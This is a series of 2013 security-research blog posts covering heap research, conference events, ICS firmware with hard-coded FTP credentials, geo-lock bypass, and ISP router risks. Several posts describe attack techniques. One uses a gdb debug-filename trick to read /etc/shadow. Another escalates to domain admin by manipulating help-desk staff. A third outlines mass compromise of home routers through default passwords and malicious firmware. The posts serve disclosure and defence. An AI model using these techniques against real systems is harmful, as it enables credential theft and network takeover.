INSIGHTS | August 23, 2013

IE heaps at Nordic Security Conference

Remember when I used to be the Windows Heap guy? Yeah, me neither ;). I just wanted to give everyone a heads up regarding my upcoming presentation “An Examination of String Allocations: IE-9 Edition” at Nordic Security Conference (www.nsc.is). The presentation title is a bit vague so I figured I would give a quick overview.
First, I’ll briefly discuss the foundational knowledge regarding heap based memory allocations using JavaScript strings in IE-6 and IE-7. These technics to manipulate the heap are well documented and have been known for quite some time [1].

While heap spraying and allocation techniques have continued to be used, public documentation of such techniques has been lacking. I specifically remember Nico Waisman talking about using the DOM [2] to perform precise allocations, but I don’t recall specific details being released. Nico’s presentation inspired me to reverse engineer a small portion of IE-9’s JavaScript implementation when it came to string based memory manipulation techniques. (Editor’s note: I’ve been holding onto this for 2 years, WTF Chris?).

Next I’ll cover, in detail, the data structures and algorithms used in IE-9 that are common during the exploitation process when performing typical string manipulations. Hopefully the details will give insight into what actually happens for vanilla exploitation attempts.

Lastly, I’ll demo a library which I’m calling heapLib2. HeapLib2 is an extension of Alex Sotirov’s original heap library that will work with modern versions of Internet Explorer when requiring precise heap-based allocations. You can now do some neat memory tricks with a few simple lines.

 



One final reflection; if you haven’t been to Nordic Security Conference (or Iceland in general) you should consider going. The conference has an attentive but laid back atmosphere while providing both highly technical and high level security presentations. If you’ve been looking for an excuse to go to Iceland get yourself to Nordic Security Conference!

 
[1] – http://www.phreedom.org/research/heap-feng-shui/
P.S. These techniques _MAY_ work with versions of IE that are greater than version 9

 

P.P.S. Ok, they DO work.
INSIGHTS | July 25, 2013

Las Vegas 2013

Again, that time of the year is approaching; thousands of people from the security community are preparing to head to Las Vegas for the most important hacking events: Black Hat USA and DefCon. IOActive will (as we do every year) have an important presence at these conferences.

We have some great researchers from our team presenting at Black Hat USA and DefCon. At Black Hat USA, Barnaby Jack will be presenting “Implantable medical devices: hacking humans”, and Lucas Apa and Carlos Mario Panagos will be presenting “Compromising industrial facilities from 40 miles away”. At DefCon, Chris Valasek will be presenting “Adventures in automotive networks and control units”.
These will be probably the most commented on talks, so don’t miss them!
During Black Hat USA, IOActive will also be hosting IOAsis. This event gives you an opportunity to meet our researchers, listen to some interesting presentations, participate in a hacking hardware workshop, and more—all while enjoying great drinks, food, and a massage.

 

Also back by popular demand and for the third time in a row, IOActive will be sponsoring and hosting Barcon. This is an invitation-only event where our top, l33t, sexy (maybe not ) researchers meet to drink and talk.

 

Lastly (but not least important), we are once again hosting “Freakshow”, our popular and greatest DefCon party, on Saturday, August 3rd at 9am at The Rio pools.

 

For your convenience, here are the details on our talks at Black Hat USA and DefCon:

 

IMPLANTABLE MEDICAL DEVICES: HACKING HUMANS
Who: Barnaby Jack
Where & When: Black Hat USA, August 1st, 2:15pm

 

In 2006, approximately 350,000 pacemakers and 173,000 ICD’s (Implantable Cardioverter Defibrillators) were implanted in the US alone. 2006 was an important year; this is when the FDA began approving fully wireless-based devices. Today there are well over 3 million pacemakers and over 1.7 million ICDs in use.
In this talk, I will focus on the security of wireless implantable medical devices and discuss how these devices operate and communicate and the security shortcomings of the current protocols. I will reveal IOActive’s internal research software that uses a common bedside transmitter to scan for and interrogate individual medical implants. Finally, I will discuss techniques that manufacturers can implement to improve the security of these devices.

 

COMPROMISING INDUSTRIAL FACILITIES FROM 40 MILES AWAY
Who: Lucas Apa and Carlos Mario Panagos
Where & When: Black Hat USA, August 1st, 3:30pm

 

The evolution of wireless technologies has allowed industrial automation and control systems (IACS) to become strategic assets for companies that rely on processing plants and facilities in industries such as energy production, oil, gas, water, utilities, refining, and petrochemical distribution and processing. Effective wireless sensor networks have enabled these companies to reduce implementation, maintenance, and equipment costs and enhance personal safety by enabling new topologies for remote monitoring and administration in hazardous locations.
However, the manner in which sensor networks handle and control cryptographic keys is very different from the way in which they are handled in traditional business networks. Sensor networks involve large numbers of sensor nodes with limited hardware capabilities, so the distribution and revocation of keys is not a trivial task.
In this presentation, we will review the most commonly implemented key distribution schemes, their weaknesses, and how vendors can more effectively align their designs with key distribution solutions. We will also demonstrate some attacks that exploit key distribution vulnerabilities, which we recently discovered in every wireless device developed over the past few years by three leading industrial wireless automation solution providers. These devices are widely used by many energy, oil, water, nuclear, natural gas, and refined petroleum companies.
An untrusted user or group within a 40-mile range could read from and inject data into these devices using radio frequency (RF) transceivers. A remotely and wirelessly exploitable memory corruption bug could disable all the sensor nodes and forever shut down an entire facility. When sensors and transmitters are attacked, remote sensor measurements on which critical decisions are made can be modified. This can lead to unexpected, harmful, and dangerous consequences.

 

Adventures in Automotive Networks and Control Units
Who: Chris Valasek
Where & When: DefCon, August 2nd, 10:00am
Automotive computers, or Electronic Control Units (ECU), were originally introduced to help with fuel efficiency and emissions problems of the 1970s but evolved into integral parts of in-car entertainment, safety controls, and enhanced automotive functionality.
In this presentation, I will examine some controls in two modern automobiles from a security researcher’s point of view. I will first cover the requisite tools and software needed to analyze a Controller Area Network (CAN) bus. I will also demo software to show how data can be read and written to the CAN bus. Then I will show how certain proprietary messages can be replayed by a device hooked up to an ODB-II connection to perform critical car functionality, such as braking and steering. Finally, I will discuss aspects of reading and modifying the firmware of ECUs installed in today’s modern automobile.

 

INSIGHTS | July 4, 2013

Why sanitize excessed equipment

My passion for cybersecurity centers on industrial controllers–PLCs, RTUs, and the other “field devices.” These devices are the interface between the integrator (e.g., HMI systems, historians, and databases) and the process (e.g., sensors and actuators). Researching this equipment can be costly because PLCs and RTUs cost thousands of dollars. Fortunately, I have an ally: surplus resellers that sell used equipment.

I have been buying used equipment for a few years now. Equipment often arrives to me literally ripped from a factory floor or even a substation. Each controller typically contains a wealth of information about its origin. I can often learn a lot about a company from a piece of used equipment. Even decades-old control equipment has a lot of memory and keeps a long record about the previous owner’s process. It is possible to learn the “secret recipe” with just a few hours of work at reverse engineering a controller to collect company names, control system network layout, and production history. Even engineers’ names and contact information is likely to be stored in a controller’s log file. For a bad guy, the data could be useful for all sorts of purposes: social engineering employees, insider trading of company stock, and possibly direct attacks to the corporate network.
I reach out to the origin of used equipment when I find these types of information. I help them wipe the equipment, and I point them to where the rest of the equipment is being sold in an attempt to recall it before the stored information ends up in the wrong hands. I am not the only one doing this kind of work. Recently, Billy Rios and Terry McCorkle revealed surplus equipment that they had purchased from a hospital. It had much of the same information about its origin.

These situations can be prevented by sanitizing the equipment before it’s released for disposal. Many equipment manufacturers should be able to provide instructions for this process. One option may be to send the controller back to the manufacturer to be sanitized and refurbished.
A way to provide another layer of protection against information disclosure is to have a robust and well-practiced Incident Response plan. Most places that I contact are great to work with and are receptive to the information.

Ignoring the issue, especially where a public utility is concerned, may be considered a violation. Set up an Incident Response program now and make sure that your process control engineers know to send equipment disposal issues through the IR group.

 

A great deal can be accomplished to keep a control system secure. With a little planning, proper equipment disposal is one of the cheapest things that can be done to keep proprietary process information safe.
INSIGHTS | June 4, 2013

Industrial Device Firmware Can Reveal FTP Treasures!

Security professionals are becoming more aware of backdoors, security bugs, certificates, and similar bugs within ICS device firmware. I want to highlight another bug that is common in the firmware for critical industrial devices: the remote access provided by some vendors between their devices and ftp servers for troubleshooting or testing. In many cases this remote access could allow an attacker to compromise the device itself, the company the device belongs to, or even the entire vendor organization.
I discovered this vulnerability while tracking connectivity test functions within the firmware for an industrial device gateway. During my research I landed on a script with ftp server information that is transmitted in the clear:
The script tests connectivity and includes two subtests. The first is a simple ping to the host “8.8.8.8”. The second test uses an internal ftp server to download a test file from the vendor’s ftp server and to upload the results back to the vendor’s server. The key instructions use the wget and wput commands shown in the screen shot.
In this script, the wget function downloads a test file from the vendor’s ftp server. When the test is complete, the wput function inserts the serial number of the device into the file name before the file is uploaded back to the vendor.
This is probably done to ensure that file names identify unique devices and for traceability.
This practice actually involves two vulnerabilities:
  • Using the device serial number as part of a filename on a relatively accessible ftp server.
  • Hardcoding the ftp server credentials within the firmware.
This combination could enable an attacker to connect to the ftp server and obtain the devices serial numbers.
The risk increases for the devices I am investigating. These device serial numbers are also used by the vendor to generate default admin passwords. This knowledge and strategy could allow an attacker to build a database of admin passwords for all of this vendor’s devices.
Another security issue comes from a different script that points to the same ftp server, this time involving anonymous access.
This vendor uses anonymous access to upload statistics gathered from each device, probably for debugging purposes. These instructions are part of the function illustrated below.
As in the first script, the name of the zipped file that is sent back to the ftp server includes the serial number.
The script even prompts the user to add the company name to the file name.
An attacker with this information can easily build a database of admin passwords linked to the company that owns the device.

 

The third script, which also involves anonymous open access to the ftp server, gathers the device configuration and uploads it to the server. The only difference between this and the previous script is the naming function, which uses the configs- prefix instead of the stats- prefix.
The anonymous account can only write files to the ftp server. This prevents anonymous users from downloading configuration files. However, the server is running an old version of the ftp service, which is vulnerable to public exploits that could allow full access to the server.
A quick review shows that many common information security best practice rules are being broken:
  1. Naming conventions disclose device serial numbers and company names. In addition, these serial numbers are used to generate unique admin passwords for each device.
  2. Credentials for the vendor’s ftp server are hard coded within device firmware. This would allow anyone who can reverse engineer the firmware to access sensitive customer information such as device serial numbers.
  3. Anonymous write access to the vendor’s ftp server is enabled. This server contains sensitive customer information, which can expose device configuration data to an attacker from the public Internet. The ftp server also contains sensitive information about the vendor.
  4. Sensitive and critical data such as industrial device configuration files are transferred in clear text.
  5. A server containing sensitive customer data and running an older version of ftp that is vulnerable to a number of known exploits is accessible from the Internet.
  6. Using Clear text protocols to transfer sensitive information over internet
Based on this review we recommend some best practices to remediate the vulnerabilities described in this article:
  1. Use secure naming conventions that do not involve potentially sensitive information.
  2. Do not hard-code credentials into firmware (read previous blog post by Ruben Santamarta).
  3. Do not transfer sensitive data using clear text protocols. Use encrypted protocols to protect data transfers.
  4. Do not transfer sensitive data unless it is encrypted. Use high-level encryption to encrypt sensitive data before it is transferred.
  5. Do not expose sensitive customer information on public ftp servers that allow anonymous access.
  6. Enforce a strong patch policy. Servers and services must be patched and updated as needed to protect against known vulnerabilities.
INSIGHTS | May 7, 2013

Bypassing Geo-locked BYOD Applications

In the wake of increasingly lenient BYOD policies within large corporations, there’s been a growing emphasis upon restricting access to business applications (and data) to specific geographic locations. Over the last 18 months more than a dozen start-ups in North America alone have sprung up seeking to offer novel security solutions in this space – essentially looking to provide mechanisms for locking application usage to a specific location or distance from an office, and ensuring that key data or functionality becomes inaccessible outside these prescribed zones.
These “Geo-locking” technologies are in hot demand as organizations try desperately to regain control of their networks, applications and data.

Over the past 9 months I’ve been asked by clients and potential investors alike for advice on the various technologies and the companies behind them. There’s quite a spectrum of available options in the geo-locking space; each start-up has a different take on the situation and has proposed (or developed) a unique way in tackling the problem. Unfortunately, in the race to secure a position in this evolving security market, much of the literature being thrust at potential customers is heavy in FUD and light in technical detail.
It may be because marketing departments are riding roughshod over the technical folks in order to establish these new companies, but in several of the solutions being proposed I’ve had concerns over the scope of the security element being offered. It’s not because the approaches being marketed aren’t useful or won’t work, it’s more because they’ve defined the problem they’re aiming to solve so narrowly that they’ve developed what I could only describe as tunnel-vision to the spectrum of threat organizations are likely to face in the BYOD realm.
In the meantime I wanted to offer this quick primer on the evolving security space that has become BYOD geo-locking.
Geo-locking BYOD
The general premise behind the current generation of geo-locking technologies is that each BYOD gadget will connect wirelessly to the corporate network and interface with critical applications. When the device is moved away from the location, those applications and data should no longer be accessible.
There are a number of approaches, but the most popular strategies can be categorized as follows:
  1. Thick-client – A full-featured application is downloaded to the BYOD gadget and typically monitors physical location elements using telemetry from GPS or the wireless carrier directly. If the location isn’t “approved” the application prevents access to any data stored locally on the device.
  2. Thin-client – a small application or driver is installed on the BYOD gadget to interface with the operating system and retrieve location information (e.g. GPS position, wireless carrier information, IP address, etc.). This application then incorporates this location information in to requests to access applications or data stored on remote systems – either through another on-device application or over a Web interface.
  3. Share-my-location – Many mobile operating systems include opt-in functionality to “share my location” via their built-in web browser. Embedded within the page request is a short geo-location description.
  4. Signal proximity – The downloaded application or driver will only interface with remote systems and data if the wireless channel being connected to by the device is approved. This is typically tied to WiFi and nanocell routers with unique identifiers and has a maximum range limited to the power of the transmitter (e.g. 50-100 meters).

The critical problem with the first three geo-locking techniques can be summed up simply as “any device can be made to lie about its location”.

The majority of start-ups have simply assumed that the geo-location information coming from the device is correct – and have not included any means of securing the integrity of that device’s location information. A few have even tried to tell customers (and investors) that it’s impossible for a device to lie about its GPS location or a location calculated off cell-tower triangulation. I suppose it should not be a surprise though – we’ve spent two decades trying to educate Web application developers to not trust client-side input validation and yet they still fall for web browser manipulations.
A quick search for “fake location” on the Apple and Android stores will reveal the prevalence and accessibility of GPS fakery. Any other data being reported from the gadget – IP address, network MAC address, cell-tower connectivity, etc. – can similarly be manipulated. In addition to manipulation of the BYOD gadget directly, alternative vectors that make use of private VPNs and local network jump points may be sufficient to bypass thin-client and “share-my-location” geo-locking application approaches.
That doesn’t mean that these geo-locking technologies should be considered unicorn pelts, but it does mean that organization’s seeking to deploy these technologies need to invest some time in determining the category of threat (and opponent) they’re prepared to combat.
If the worst case scenario is of a nurse losing a hospital iPad and that an inept thief may try to access patient records from another part of the city, then many of the geo-locking approaches will work quite well. However, if the scenario is that of a tech-savvy reporter paying the nurse to access the hospital iPad and is prepared in install a few small applications that manipulate the geo-location information in order to remotely access celebrity patient records… well, then you’ll need a different class of defense.
Given the rapid evolution of BYOD geo-locking applications and the number of new businesses offering security solutions in this space, my advice is two-fold – determine the worst case scenarios you’re trying to protect against, and thoroughly assess the technology prior to investment. Don’t be surprised if the marketing claims being made by many of these start-ups are a generation or two ahead of what the product is capable of performing today.
Having already assessed or reviewed the approaches of several start-ups in this particular BYOD security realm, I believe some degree of skepticism and caution is warranted.
— Gunter Ollmann, CTO IOActive
INSIGHTS | April 18, 2013

InfoSec Europe 2013 – Security on Tap

It’s that time of the year again as Europe’s largest and most prestigious information security conference “Infosecurity Europe” gets ready to kick off next week at Earls Court, London, UK.

This year’s 18th annual security gathering features over 350 exhibitors, but you won’t find IOActive on the floor of the conference center. Oh no, we’re pulling out all the stops and have picked a quieter and more exclusive location to conduct our business just around the corner. After all, why would you want to discuss confidential security issues on a floor with 12,500 other folks?

We all know what these conferences are like. We psych ourselves up for a couple of days for shuffling from one booth to the next, avoiding eye contact with the glammed-up booth-babes working their magic on blah-blah’s vendor booth – who’s only mission in life is to scan your badge so that a far-off marketing team can spam you for the next 6 months with updates about a product you had no interest in – who you unfortunately allowed to scan your badge because they were giving away an interesting  foam boomerang (that probably cost 20 pence) which you thought one of your kids might like as recompense for the guilt you’re feeling at having to be away from home one evening so you could see all of what the conference had to offer.

Well fret no more, IOActive have come to save the day!

After you’ve grown tired and wary of the endless shuffling, avoided eye-contact for as long as possible, grabbed enough swag to keep the neighbors grandchildren happy for a decade’s worth of birthdays, and the imminent prospect of standing in queues for over priced tasteless coffee and tea has made your eyes roll further in to the back of your skull one last time, come visit IOActive down the street at the pub we’ve taken over! Yes, that’s right, IOActive crew have taken hostage a pub and we’re inviting you and a select bunch of our VIP’s to come join us in a more relaxed and conducive business environment.

I hear tell that the “Security on Tap” will include a range of fine ales, food and other refreshments, and that the decibel level should be a good 50dB lower than Earls Court Conference Center. A little birdy also mentioned that there may be a whisky tasting going on at some point too. Oh, and there’ll be a bunch of us IOActive folks there too. Chris Valasek and I, along with some of our top UK-based consultants will be there talk about the latest security threats and evil hackers. I think there’ll be some sales folks there too – but don’t worry, we’ll make sure that their badge readers don’t work.

If you’d like to join us for drinks, refreshments and intelligent conversation in a venue that’s comfortable and won’t have you going hoarse (apparently “horse” is bad these days) – you’re cordially invited to join us at the Courtfield Pub (187 Earls Court Road, Earls Court, London, SW5 9AN). We’ll be there Tuesday and Wednesday (April 23rd & 24th) between 10:00 and 17:00.

— Gunter Ollmann, CTO IOActive

INSIGHTS | April 16, 2013

Can GDB’s List Source Code Be Used for Evil Purposes?

One day while debugging an ELF executable with the GNU Debugger (GDB), I asked myself, “How does GDB know which file to read when you use the list command?” (For the uninformed, the list command prints a specified number of lines from a source code file -— ten lines is the default.)
Source code filenames are contained in the metadata of an ELF executable (in the .debug_line section, to be exact). When you use the list command, GDB will open(), read(), and display the file contents if and only if GDB has the permissions needed to read the source file. 
The following is a simple trick where you can use GDB as a trampoline to read a file which originally you don’t have enough permission to read. This trick could also be helpful in a binary capture-the-flag (CTF) or reverse engineering challenge.
Here are the steps:
 

1. Compile ‘foo.c‘ with the GNU Compiler (GCC) using the -ggdb flag.

2. Open the resulting ELF executable with GDB and the list command to read its source code as shown in the following screen shot:

 

3. Make a copy of ‘foo.c’ and call it ‘_etc_shadow.c’, so that this name is hardcoded within the internal metadata structures of the compiled ELF executable as in the following screen shot.

 

4. Open the executable with your preferred hex editor (I used HT Editor because it supports the ELF file format) and replace ‘_etc_shadow.c’ with ‘/etc/shadow’ (don’t forget the NULL character at the end of the string) the first two times it appears.

 

5. Evidently, it won’t work unless you have sufficient user privileges, otherwise GDB won’t be able to read /etc/shadow.

 

6. If you trace the open() syscall calls executed by GBD:

 ($strace -e open gdb ./_etc_shadow) 
you can see that it returns -1 (EACCES) because of insufficient permissions.
 

7. Now imagine that for some reason GDB is a privileged command (the SUID (Set User ID) bit in the permissions is enabled). Opening our modified ELF file with GDB, it would be possible to read the contents of ‘/etc/shadow’ because the gdb command would be executed with root privileges.

 

8. Imagine another hypothetical scenario: a hardened development (or CTF) server that has been configured with granular privileges using a tool such as Sudo to allow certain commands to be executed. (To be honest I have never seen a scenario like this before, but it’s an example worth considering to illustrate how this attack might evolve).

 

9. You cannot display the contents of‘/etc/shadow’ by using the cat command because /bin/cat is an unauthorized command in our configuration. However, the gdb command has been authorized and therefore has the rights needed to display the source file (/etc/shadow):

 

Voilà! 
 

Taking advantage of this GDB feature and mixing it with other techniques could make a more sophisticated attack possible. Use your imagination.
 

Do you have other ideas how this could be used as an attack vector, either by itself or if combined with other techniques? Let me know.
INSIGHTS | April 10, 2013

What Would MacGyver Do?

“The great thing about a map: it gets you in and out of places in a lot different ways.” – MacGyver 

 

When I was young I was a big fan of the American TV show, MacGyver. Every week I tuned in to see how MacGyver would build some truly incredible things with very basic and unexpected materials — even if some of his solutions were hard to believe. For example, in one episode MacGyver built a futuristic motorized heat-seeking gun using only a set of batteries, an electric mixer, a rubber band, a serving cart, and half a suit of armor.

 
 

From that time I always kept the “What would MacGyver do?” spirit in my thinking. On the other hand I think I was “destined” to be an IT guy, and particularly in the security field, where we don’t have quite the same variety of materials to craft our solutions. 

 

But the “What would MacGyver do?” frame of mind helped me figure out a simple way to completely “own” a network environment in a MacGyver sort of way using just a small set of steps, including:

 
  • Exploiting a bad use of tools.
  • A small piece of social engineering.
  • Some creativity.
  • A small number of manual configuration changes..

I’ll relate how I lucked into this opportunity, how easy it can be to exploit certain circumstances, and especially how easy it would be to use a similar technique to gain domain administrator access for a company network.

 

The whole situation was due to the way helpdesk support was provided at the company I was working for. For security reasons non-administrative domain users were prevented from installing software on their desktops. So when I tried to install a small software application I received a very respectful “access denied” message. I felt a bit annoyed by this but still wanted my application, so I called the helpdesk and asked them to finish the installation remotely for me.

 

The helpdesk person was amenable, so I gave him my machine name and soon saw a pop-up window indicating that someone had connected to my machine and was interacting with my desktop.

 
 
 

My first impression was “Oh cool, this helpdesk is responsive and soon my software will be installed and I can finally start my project.”

 

But when I thought about this a bit more I started to wonder how the helpdesk person could install my software since he was trying to do so with my user privileges and desktop session rather than logging me out and connecting as an administrator.

 

And here we arrive at our first Act.

 

Act #1: Bad use of tools

 

Everything became clear when the helpdesk guy emulated a Ctrl+Alt+Delete combination that brings up the Windows menu and its awesome Switch User option. 

 
 
 

The helpdesk guy clicked the Switch User option and here I saw some magic — namely the support guy logging in right before my eyes with the local Administrator account.

 
 

Picture this: the support guy was typing in the password directly in front of my eyes. Even though I am an IT guy this was the first time I ever saw a support person interacting live with the Windows login screen. I wished I could see or intercept the password, but unfortunately I only saw ugly black dots in the password dialog box.

 

At that moment I felt frustrated, because I realized how close I was to having the local administrator password. But how could I get it?

 

The magic became clearer when the support guy logged in as an administrator on the machine and I was able to see him interacting with the desktop. That really made my day.

 
 
 
 
 

And then something even more magnificent happened while I was watching: for some undefined reason the support guy encountered a Windows session error. He had no choice but to log out, which he did, and then he logged in again with the Domain Administrator account … again right before my eyes!

 

(I don’t have a domain lab set up right now, so I can’t duplicate the screen image, but I am sure you can imagine the login window, which would look just like the one above except that it would include the domain name.)

 

When he logged in as the domain administrator I saw another nice desktop and the helpdesk guy interacting with my machine right in front of my eyes as the domain admin.

 

This is when I had a devious idea: I moved my mouse one millimeter and it moved while this guy was installing my software. At this point we arrive at the second Act.

 

Act #2: Some MacGyver magic

 

I asked myself, what if I did the following:

 

 

 

  • Unplug the network cable (I could have taken control of the mouse instead, but that would have aroused suspicion).
  • Stop the DameWare service that is providing access to the support guy.
  • Reconnect the network cable.
  • Create a new domain admin account (since the domain administrator is the operative account on my computer).
  • Restart the DameWare service.
  • Log out of the machine.

 

 

 

 

By completing these six steps that wouldn’t take more than two minutes I could have assumed domain administrator privileges for the entire company. 
Let’s recap the formula for this awesome sauce:

 

1. Bad use of tools: It was totally wrong for the help desk person to open a domain admin session directly under the user’s eyes and giving him the opportunity to take control of the session. 

2. A small piece of social engineering: Just call the support desk and ask them to install some software for you. 

3. A small amount of finagling on your part: Use the following steps when the help desk person logs in to push him to log in as Domain Admin:

       Unplug the network cable (1 second).
     •      Change the local administrator password (7 seconds).
     •       Log out (2 seconds).
     •      Plug the network cable back in (1 second).

4. Another small piece of social engineering: Call the support person back and blame Microsoft Windows for a crash. Cross your fingers that after he is unable  to login as local admin (because you changed the password) he will instead login as a domain administrator.

5. Some more finagling on your part: Do the same steps defined in step 3 to create a new domain admin account.

6. Success: Enjoy being a domain administrator for the company.


Final Act: Conclusion


At the beginning of my IT security career I was a bit skeptical of the magic of social engineering. But through the years I have learned that social engineering still works and will always work. Even if the social engineering involves the tiniest and most basic request, if you combine social engineering with some imagination you can own a huge company. And if you are conducting a pentest you don’t always have to rely exclusively on your technical expertise in pentesting. You can draw on your imagination and creativity to build a powerful weapon using small and basic tools …. just like MacGyver.
INSIGHTS | March 28, 2013

Behind ADSL Lines: How to Bankrupt ISPs While Making Money

Disclaimer: No businesses or even the Internet were harmed while researching this post. We will explore how an attacker can control the Internet access of one or more ISPs or countries through ordinary routers and Internet modems.

Cyber-attacks are hardly new in 2013. But what if an attack is both incredibly easy to construct and yet persistent enough to shut Internet services down for a few hours or even days? In this blog post we will talk about how easy it would be to enlist ordinary home Internet connections in this kind of attack, and then we suggest some potentially straightforward solutions to this problem.
The first problem
The Internet in the last 10 to 20 years has become the most pervasive way to communicate and share news on the planet. Today even people who are not at all technical and who do not love technology still use their computers and Internet-connected devices to share pictures, news, and almost everything else imaginable with friends and acquaintances.
All of these computers and devices are connected via CPEs (customer premises equipment) such as routers, modems, and set-top boxes etc. that enable consumers to connect to the Internet. Although most people consider these CPEs to be little magic boxes that do not need any sort of provisioning, in fact these plug-and-play devices are a key, yet weak link behind many major attacks occurring across the web today.
These little magic boxes come with some nifty default features:
  • Updateable firmware.
  • Default passwords.
  • Port forwarding.
  • Accessibility over http or telnet.
 
The second problem
All ISPs across the world share a common flaw. Look at the following screen shot and think about how one might leverage this flaw.
Most ISPs that own one or more netblocks typically write meaningful descriptions that provide some insight into what they are used for.
Attack phase 1
So what could an attacker do with this data?
  1. They can gather a lot of information about netblocks for one or more ISPs and even countries and some information about their use from http://bgp.he.net and http://ipinfodb.com.
  2. Next, they can use whois or parse bgp.he.net to search for additional information about these netblocks, such as data about ADSL, DSL, Wi-Fi, Internet users, and so on.
  3. Finally, the attacker can convert the matched netblocks into IP addresses.
At this point the attacker could have:
  • Identified netblocks for an entire ISP or country.
  • Pinpointed a lot of ADSL networks, so they have minimized the effort required to scan the entire Internet. With a database gathered and sorted by ISP and country an attacker can, if they wanted to, control a specific ISP or country.
Next the attacker can test how many CPEs he can identify in a short space of time to see whether this attack would be worth pursuing:
A few hours later the results are in:

 

 

 

 

 

In this case the attacker has identified more than 400,000 CPEs that are potentially vulnerable to the simplest of attacks, which is to scan the CPEs using both telnet and http for their default passwords.
We can illustrate the attacker’s plan with a simple diagram:

 

Attack Phase 2 (Command Persistence) 
Widely available tools such as binwalk, firmware-mod-kit, and unix dd make it possible to modify firmware and gain persistent control over CPEs. And obtaining firmware for routers is relatively easy. There are several options:
  1. The router is supported by dd-wrt (http://dd-wrt.com)
  2. The attacker either works at an ISP or has a friend who works at an ISP and happens to have easy access to assorted firmware.
  3. Search engines and dorks.
As soon as the attacker is comfortable with his reverse-engineered and modified firmware he can categorize them by CPE model and match them to the realm received from the CPE under attack. In fact with a bit of tinkering an attacker can automate this process completely, including the ability to upload the new firmware to the CPEs he has targeted. Once installed, even a factory reset will not remove his control over that CPE.
The firmware modifications that would be of value to attacker include but are not limited to the following:
  • Hardcoded DNS servers.
  • New IP table rules that work well on dd-wrt-supported CPEs.
  • Remove the Upload New Firmware page.
CPE attack phase recap
  1. An attacker gathers a country’s netblocks.
  2. He filters ADSL networks.
  3. He reverse engineers and modifies firmware.
  4. He scans ranges and uploads the modified firmware to targeted CPEs.
Follow-up attack scenarios
If an attacker is able to successfully compromise a large number of CPEs with the relatively simple attack described above, what can he do for a follow-up?
  • ISP attack: Let’s say an ISP has a large number of IP addresses vulnerable to the CPE compromise attack and an attacker modifies the firmware settings on all the ADSL routers on one or more of the ISP’s netblocks. Most ISP customers are not technical, so when their router is unable to connect to the Internet the first thing they will do is contact the ISP’s Call Center. Will the Call Center be able to handle the sudden spike in the number of calls? How many customers will be left on hold? And what if this happens every day for a week, two weeks or even a month? And if the firmware on these CPEs is unfixable through the Help Desk, they may have to replace all of the damaged CPEs, which becomes an extremely costly affair for the company.
  • Controlling traffic: If an attacker controls a huge number of CPEs and their DNS settings, being able to manipulate website traffic rankings will be quite trivial. The attacker can also redirect traffic that was supposed to go to a certain site or search engine to another site or search engine or anywhere else that comes to mind. (And as suggested before, the attacker can shut down the Internet for all of these users for a very long time.)
  • Company reputations: An attacker can post:
    • False news on cloned websites.
    • A fake marketing campaign on an organization’s website.
  • Make money: An attacker can redirect all traffic from the compromised CPEs to his ads and make money from the resulting impressions. An attacker can also add auto-clickers to his attack to further enhance his revenue potential.
  • Exposing machines behind NAT: An attacker can take it a step further by using port forwarding to expose all PCs behind a router, which would further increase the attack’s potential impact from CPEs to the computers connected to those CPEs.
  • Launch DDoS attacks: Since the attacker can control traffic from thousands of CPEs to the Internet he can direct large amounts of traffic at a desired victim as part of a DDoS attack.
  • Attack ISP service management engines, Radius, and LDAP: Every time a CPE is restarted a new session is requested; if an attacker can harvest enough of an ISP’s CPEs he can cause Radius, LDAP and other ISP services to fail.
  • Disconnect a country from the Internet: If a country’s ISPs do not protect against the kind of attack we have described an entire country could be disconnected from the Internet until the problem is resolved.
  • Stealing credentials: This is nothing new. If DNS records are totally in the control of an attacker, they can clone a few key social networking or banking sites and from there they could steal all the credentials he or she wants.
In the end it would be almost impossible to take back control of all the CPEs that were compromised through the attack strategies described above. The only way an ISP could recover from this kind of incident would be to make all their subscribers buy new modems or routers, or alternatively provide them with new ones.
Solutions
There are two solutions to this problem. This involves fixes from CPE vendors and also from the ISPs.
Vendor solution: 
Vendors should stop releasing CPEs that have only rudimentary and superficial default passwords. When a router is being installed on a user’s premises the user should be required to change the administrator password to a random value before the CPE becomes fully functional.
ISP solutions: 
Let’s look at a normal flow of how a user receives his IP address from an ISP:
  1. The subscriber turns on his home router or modem, which sends an authentication request to the ISP.
  2. ISP network devices handle the request and forwards it to Radius to check the authentication data.
  3. The Radius Server sends Access-Accept or Access-Reject messages back to the network device.
  4. If the Access-Accept message is valid, DHCP assigns an IP to the subscriber and the subscriber is now able to access the Internet.
However, this is how we think this process should change:
  1. Before the subscriber receives an IP from DHCP the ISP should check the settings on the CPE.
  2. If the router or modem is using the default settings, the ISP should continue to block the subscriber from accessing the Internet. Instead of allowing access, the ISP should redirect the subscriber to a web page with a message “You May Be At Risk: Consult your manual and update your device or call our help desk to assist you.
  3. Another way of doing this on the ISP side is to deny access from the Broadband Remote Access Server (BRAS) routers that are at the customer’s edge; an ACL could deny some incoming ports, but not limited to 80,443,23,21,8000,8080, and so on.
  4. ISPs on international gateways should deny access to the above ports from the Internet to their ADSL ranges.
Detecting attacks
ISPs should be detecting these types of attacks. Rather than placing sensors all over the ISP’s network, the simplest way to detect attacks and grab evidence is to lure such attackers into a honeypot. Sensors would be a waste of money and require too much administrative overhead, so let’s focus on one server:
        1- Take a few unused ADSL subnets /24
x.x.x.0/24
x.x.y.0/24 and so on
 
2- Configure the server to be a sensor:
A simple telnet server and a simple Apache server with htpasswd setup as admin admin on the web server’s root directory would suffice.
3- On the router that sits before the servers configure static routes with settings that look something like this:
route x.x.x.0/24 next-hop <server-ip>;
route x.x.y.0/24 next-hop <server-ip>;
route x.x.z.0/24 next-hop <server-ip>;
4- After that you should redistribute your static routes to advertise them on BGP so when anyone scans or connects to any IP in the above subnets they will be redirected to your server.
 
5- On the server side (it should probably be a linux server) the following could be applied (in the iptables rules):
iptables -t nat -A PREROUTING -p tcp -d x.x.x.0/24 –dport 23 -j DNAT –to <server-ip>:24
iptables -t nat -A PREROUTING -p tcp -d x.x.y.0/24 –dport 23 -j DNAT –to <server-ip>:24
iptables -t nat -A PREROUTING -p tcp -d x.x.z.0/24 –dport 23 -j DNAT –to <server-ip>:24
 
  6- Configure the server’s honeypot to listen on port 24; the logs can be set to track the x.x.(x|y|z).0/24 subnets instead of the server.
Conclusion
The Internet is about traffic from a source to a destination and most of it is generated by users. If users cannot reach their destination then the Internet is useless. ISPs should make sure that end users are secure and users should demand  ISPs to implement rules to keep them secure. At the same time, vendors should come up with a way to securely provision their CPEs before they are connected to the Internet by forcing owners to create non-dictionary/random usernames or passwords for these devices.
INSIGHTS | February 25, 2013

IOAsis at RSA 2013

